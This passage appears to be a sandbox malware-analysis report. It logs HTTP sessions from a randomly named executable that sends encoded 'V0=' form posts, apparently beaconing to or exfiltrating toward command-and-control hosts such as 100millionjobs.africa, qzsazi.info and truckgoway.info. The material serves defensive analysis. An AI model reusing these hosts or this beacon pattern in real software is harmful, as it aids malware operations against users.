                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.450017136.243.64.147804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:46.853456974 CET698OUTPOST /ktot/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/ktot/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 64 76 34 38 31 52 6a 79 58 58 47 31 66 32 57 69 35 46 64 55 41 55 68 74 43 2f 34 45 36 4d 53 7a 69 78 65 4c 74 6b 43 43 4f 48 75 73 73 57 30 31 39 42 37 31 47 69 63 51 34 77 62 32 77 58 4c 6a 6e 59 51 46 30 33 75 37 33 48 5a 30 79 34 2b 70 35 67 41 53 76 62 36 41 33 70 4a 6e 6e 64 58 4d 69 50 39 6c 7a 51 2b 62 5a 58 7a 72 57 69 43 6f 2f 65 2b 4c 74 49 77 35 4d 51 53 68 70 77 6d 55 70 65 38 4c 6e 65 54 72 2f 43 5a 58 53 56 45 45 6b 55 45 34 62 64 6e 41 35 79 59 6a 49 4b 6c 72 31 68 4b 6c 6f 61 6d 48 6c 68 42 74 42 63 4e 4f 4f 38 32 43 6d 36 6c 79 65 72 59 77 38 58 77 77 55 4e 37 4f 4d 55 6f 62 39 43 48 34 6b 79 79 6f 4f 33 37 6c 4a 6a 38 3d
                                                                                                                          Data Ascii: V0=dv481RjyXXG1f2Wi5FdUAUhtC/4E6MSzixeLtkCCOHussW019B71GicQ4wb2wXLjnYQF03u73HZ0y4+p5gASvb6A3pJnndXMiP9lzQ+bZXzrWiCo/e+LtIw5MQShpwmUpe8LneTr/CZXSVEEkUE4bdnA5yYjIKlr1hKloamHlhBtBcNOO82Cm6lyerYw8XwwUN7OMUob9CH4kyyoO37lJj8=
                                                                                                                          Jan 15, 2025 18:16:47.587686062 CET493INHTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:47 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.450018136.243.64.147804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:49.399667025 CET10780OUTPOST /ktot/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/ktot/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 64 76 34 38 31 52 6a 79 58 58 47 31 66 32 57 69 35 46 64 55 41 55 68 74 43 2f 34 45 36 4d 53 7a 69 78 65 4c 74 6b 43 43 4f 48 57 73 73 46 38 31 38 69 54 31 48 69 63 51 31 51 62 4e 77 58 4b 6a 6e 59 49 42 30 33 7a 4d 33 46 52 30 67 4c 32 70 34 52 41 53 36 4c 36 41 72 5a 4a 6d 6a 64 57 45 69 50 4e 68 7a 51 75 62 5a 58 7a 72 57 6e 47 6f 70 37 43 4c 68 6f 77 36 45 77 53 45 37 41 6d 6f 70 64 4d 39 6e 65 47 57 2b 79 35 58 53 31 30 45 6f 43 51 34 45 4e 6e 43 33 53 59 37 49 4b 35 30 31 69 2b 54 6f 5a 36 70 6c 6d 78 74 44 49 4d 4f 62 65 47 41 7a 34 68 56 43 4a 34 51 79 6c 59 55 54 4d 2f 5a 43 6c 77 6b 6e 79 33 36 70 46 4c 76 64 33 66 5a 4b 6d 63 33 4c 68 2b 45 33 4b 4a 4b 76 51 38 4e 6a 70 74 6e 39 39 78 2f 65 64 4d 31 6d 47 72 2b 68 79 6b 68 78 39 45 48 51 41 62 31 45 68 4e 74 7a 4f 78 70 68 4d 52 79 53 4e 56 34 53 50 33 5a 54 57 32 59 58 38 42 45 44 77 32 2f 33 4f 55 6d 61 49 71 45 34 72 46 6e 4a 55 30 51 72 39 49 64 4c 43 71 32 6c 30 4c 36 6a 42 70 4a 4f 4f 63 75 50 46 6f 4a 76 34 37 41 57 53 67 [TRUNCATED]
                                                                                                                          Data Ascii: V0=dv481RjyXXG1f2Wi5FdUAUhtC/4E6MSzixeLtkCCOHWssF818iT1HicQ1QbNwXKjnYIB03zM3FR0gL2p4RAS6L6ArZJmjdWEiPNhzQubZXzrWnGop7CLhow6EwSE7AmopdM9neGW+y5XS10EoCQ4ENnC3SY7IK501i+ToZ6plmxtDIMObeGAz4hVCJ4QylYUTM/ZClwkny36pFLvd3fZKmc3Lh+E3KJKvQ8Njptn99x/edM1mGr+hykhx9EHQAb1EhNtzOxphMRySNV4SP3ZTW2YX8BEDw2/3OUmaIqE4rFnJU0Qr9IdLCq2l0L6jBpJOOcuPFoJv47AWSg2AdVyPjgjsMhHVPW4YHFM5wlZLrG3E3EeavFbyFdFGsrCanL6yGc1XpDsp8rA+gRMw5bqOfWUagSK9GbpiQf1N5Pb779lLvgbZQbxLH3Svblv19xquv2M8N1WXBnVILPHU0sq6CRrj38uYKk0nYV8VDolBb2f6YZlTTrgc/VJRrGJHsizkBe9wpn0EsjApFvaLxG6TvcgX5OJ2FL+3xWyUn9eONrd0EydTwn0QYqt8Zmw5Syogg5FPk1PXMz12PgJ9IhHljIt47j092CUKpOdz9OOn5mD5jrhCQs/3XLvHwwxUV9fvrTQAthtGxKPO4MZw1r0iBr5mWIKXrJuij1ZbHRWt08PZY9Ln/Tb0ObAi+MTfmHFC637d/FrB3JlN5lfbHEPlgwYIl/oaMx9YwDIZpLkm8DEWt+b/9kRJBKgOW9FqDDcQdThUTQmtrfAa3Z8fbFiKq2dQiR1loiTFvdo8U9z6dseJnWQLdb0RFx3Nudo756ZjuEjg0vOkyRzTTtEVNMrbo4EwfdCDJtWDElIMmdueF+rsTM9DU3gBEd62L0jKoWdepfgZ6xST05aEoMWkm/OZsSYRLCO5nLEtstkwA6bnh+dAZ1epN+yjeQnjEHQQ3igv4fm+x4h1iH7flzhb0qKAYgQ1Pl8wyNEuVsXh2HNnTWsMRxo0 [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:50.021580935 CET493INHTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:49 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.450019136.243.64.147804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:51.940855026 CET392OUTGET /ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s= HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:16:52.577630043 CET771INHTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:52 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s=
                                                                                                                          Content-Length: 431
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 3f 36 4e 57 54 3d 75 62 74 4c 53 7a 6c 26 61 6d 70 3b 56 30 3d 51 74 51 63 32 6d 71 4e 4a 77 76 4d 47 42 53 72 37 56 30 7a 50 55 67 32 4b 65 34 58 79 74 36 32 70 6c 57 48 76 45 6e 79 56 44 66 70 35 47 67 39 2b 58 62 6c 44 58 38 79 31 57 4c 37 39 6c 4b 78 68 70 35 6b 73 6e 33 6d 69 6b 35 42 67 63 4f 6e 7a 77 34 63 6b 36 4c 33 30 72 5a 6b 75 4f 43 65 36 63 52 70 39 77 53 49 4f 67 6e 77 48 79 48 6e 6f 4c 75 76 6c 39 73 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&amp;V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.45002047.83.1.90804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:14.136756897 CET648OUTPOST /bqha/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          Origin: http://www.qzsazi.info
                                                                                                                          Referer: http://www.qzsazi.info/bqha/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 61 59 34 79 39 4a 5a 70 6e 2b 6d 61 4e 79 71 4d 30 70 2b 73 73 51 74 6b 65 62 6a 72 42 56 6f 77 53 4e 4f 43 6c 74 6f 31 62 43 64 33 63 37 42 61 76 76 61 46 50 6c 32 65 44 75 4e 79 77 7a 55 34 75 72 68 47 56 33 35 6f 48 77 43 66 59 57 4a 51 76 7a 6e 50 30 49 77 77 4e 56 46 4d 79 51 51 78 75 33 56 56 53 68 33 4a 50 46 6c 4b 41 64 2b 6d 79 6e 4d 5a 4d 31 63 77 57 58 55 30 4c 71 59 64 56 2f 56 74 51 30 49 59 41 68 62 41 69 42 38 58 4e 4f 43 52 71 5a 70 4d 79 4a 65 34 43 52 49 58 2b 45 73 55 50 76 44 44 6a 41 55 42 6e 33 71 69 6d 38 41 2b 44 64 61 2f 69 50 2f 35 6d 49 4d 67 43 67 3d 3d
                                                                                                                          Data Ascii: V0=aY4y9JZpn+maNyqM0p+ssQtkebjrBVowSNOClto1bCd3c7BavvaFPl2eDuNywzU4urhGV35oHwCfYWJQvznP0IwwNVFMyQQxu3VVSh3JPFlKAd+mynMZM1cwWXU0LqYdV/VtQ0IYAhbAiB8XNOCRqZpMyJe4CRIX+EsUPvDDjAUBn3qim8A+Dda/iP/5mIMgCg==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.45002147.83.1.90804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:16.682286978 CET668OUTPOST /bqha/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          Origin: http://www.qzsazi.info
                                                                                                                          Referer: http://www.qzsazi.info/bqha/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 61 59 34 79 39 4a 5a 70 6e 2b 6d 61 43 78 69 4d 6e 59 2b 73 72 77 74 6e 51 37 6a 72 54 56 6f 30 53 4e 79 43 6c 73 38 66 61 77 35 33 64 65 6c 61 75 74 79 46 43 46 32 65 62 65 4e 33 2b 54 55 33 75 73 70 4f 56 79 42 6f 48 77 2b 66 59 55 42 51 76 43 6e 4d 79 59 77 79 59 46 46 4f 71 77 51 78 75 33 56 56 53 68 6a 6e 50 46 4e 4b 41 74 4f 6d 7a 43 34 59 58 56 63 7a 52 58 55 30 50 71 59 5a 56 2f 55 43 51 31 6c 39 41 69 6a 41 69 45 51 58 4e 66 43 53 6a 5a 6f 6d 39 70 66 6e 54 44 5a 69 34 30 74 5a 4d 75 72 39 72 51 59 31 69 78 6e 34 33 4e 68 70 52 64 2b 4d 2f 49 32 4e 72 4c 78 70 5a 6f 2b 78 4b 64 53 76 54 32 6e 36 79 77 55 31 51 2b 75 51 59 68 41 3d
                                                                                                                          Data Ascii: V0=aY4y9JZpn+maCxiMnY+srwtnQ7jrTVo0SNyCls8faw53delautyFCF2ebeN3+TU3uspOVyBoHw+fYUBQvCnMyYwyYFFOqwQxu3VVShjnPFNKAtOmzC4YXVczRXU0PqYZV/UCQ1l9AijAiEQXNfCSjZom9pfnTDZi40tZMur9rQY1ixn43NhpRd+M/I2NrLxpZo+xKdSvT2n6ywU1Q+uQYhA=
                                                                                                                          Jan 15, 2025 18:17:18.094875097 CET137INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:17 GMT
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.45002247.83.1.90804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:19.234355927 CET10750OUTPOST /bqha/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          Origin: http://www.qzsazi.info
                                                                                                                          Referer: http://www.qzsazi.info/bqha/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 61 59 34 79 39 4a 5a 70 6e 2b 6d 61 43 78 69 4d 6e 59 2b 73 72 77 74 6e 51 37 6a 72 54 56 6f 30 53 4e 79 43 6c 73 38 66 61 77 78 33 64 73 74 61 76 4b 47 46 44 46 32 65 46 75 4e 32 2b 54 55 51 75 74 4e 43 56 79 45 58 48 31 79 66 5a 33 5a 51 70 32 54 4d 37 59 77 79 48 31 46 50 79 51 51 6f 75 7a 78 76 53 68 7a 6e 50 46 4e 4b 41 76 47 6d 6c 6e 4d 59 56 56 63 77 57 58 55 34 4c 71 59 78 56 2f 38 34 51 31 52 44 41 53 44 41 68 6c 38 58 50 74 61 53 73 5a 70 41 30 35 66 76 54 44 56 4c 34 30 68 2f 4d 75 76 58 72 53 45 31 76 6d 32 77 75 66 64 4e 46 4d 47 66 6e 4b 32 39 6c 35 41 6f 43 35 2b 36 42 2b 61 6a 50 6d 2b 55 34 48 30 39 45 2b 2b 58 4d 55 38 30 54 47 39 32 72 65 51 77 7a 4e 39 74 38 5a 6a 38 71 45 74 66 69 55 31 54 72 6f 76 39 53 6a 34 32 72 31 6f 53 6b 53 73 66 62 62 78 50 69 5a 57 66 44 62 41 63 44 36 48 50 57 32 49 51 79 64 75 74 75 4e 51 4f 67 58 34 66 6f 49 63 4c 41 33 75 5a 46 66 6f 44 48 6c 41 37 2f 75 62 58 53 30 43 36 43 33 42 69 78 76 78 6c 6d 51 43 74 51 5a 4d 79 42 4c 33 2b 38 47 73 [TRUNCATED]
                                                                                                                          Data Ascii: V0=aY4y9JZpn+maCxiMnY+srwtnQ7jrTVo0SNyCls8fawx3dstavKGFDF2eFuN2+TUQutNCVyEXH1yfZ3ZQp2TM7YwyH1FPyQQouzxvShznPFNKAvGmlnMYVVcwWXU4LqYxV/84Q1RDASDAhl8XPtaSsZpA05fvTDVL40h/MuvXrSE1vm2wufdNFMGfnK29l5AoC5+6B+ajPm+U4H09E++XMU80TG92reQwzN9t8Zj8qEtfiU1Trov9Sj42r1oSkSsfbbxPiZWfDbAcD6HPW2IQydutuNQOgX4foIcLA3uZFfoDHlA7/ubXS0C6C3BixvxlmQCtQZMyBL3+8GsILMlXl4IbYXQwCIPEb2t5RaMpsagePRlY109lEMrVy1DPgLePQmV+GUpDCIuG6ZV/M8D6znQxqqxe1I2W6Eyi6olZnSwp+awSeOduz8cnxz7zFLWsO86gUouUv73cVAlOEfwgx3vwcRrO1pS/ftWvQyLrrlBWazRAgpGMTmx8VmrHIZ5PSrN/+IuxPx16sGH4U5KekUemtjFMY+oXdiHRmiVUsO+YPkbSD7UleEgdRw4LFtOk2pFaFvqo1+y9pkDKUEq4V+xRVOg3rvQgF7+zyLGTJqaI8H/3b0JGhUldht6TzsMEcM2aGQlsRQDWRziptVOH164li4qWvo0V4ja3F/qnHpjG+Q299O8LzgqTQt7SYJzwpFqDN+FE22g3daCNc6D3BWeU2go5bpT/0OmdejKAI3Uo/0vw5Gn7XPl4+GjfUWU4bbN577eaOGKLJ+9YORVFk76mBbydWRNAoFG6zU3849kvXTXp5l85mYKtw5f8pgMI+EBIocUnS5x9/PZBYYiwX5LAcxW8SMA//GT+QrO9wfYZx9YXbMTSDXw1iBZaoqi24Ea7JRs5LsMiLreObIl+J8vteoImgMrpbjugbU395hlDUTPfTy7S/6XkoFnge+xkKlAshl0VXoPl0SmeXWfsp/RM58Dli3CGACrCuBq2KHvHoJ8Uc [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:17:20.727809906 CET137INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:20 GMT
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.45002347.83.1.90804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:21.785057068 CET382OUTGET /bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:17:23.413017035 CET139INHTTP/1.1 567 unknown
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:23 GMT
                                                                                                                          Content-Length: 17
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                                                          Data Ascii: Request too large


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.45002484.32.84.32804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:28.550195932 CET660OUTPOST /m320/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          Origin: http://www.truckgoway.info
                                                                                                                          Referer: http://www.truckgoway.info/m320/
